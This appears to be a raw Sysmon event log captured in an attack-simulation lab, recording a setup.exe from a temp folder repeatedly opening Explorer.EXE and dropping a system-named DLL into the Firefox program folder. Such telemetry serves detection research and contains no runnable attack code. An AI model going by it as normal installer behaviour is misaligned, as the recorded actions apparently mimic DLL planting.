13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-core-processthreads-l1-1-1.dll2021-01-18 13:59:52.130 10341000x800000000000000014205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.114{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 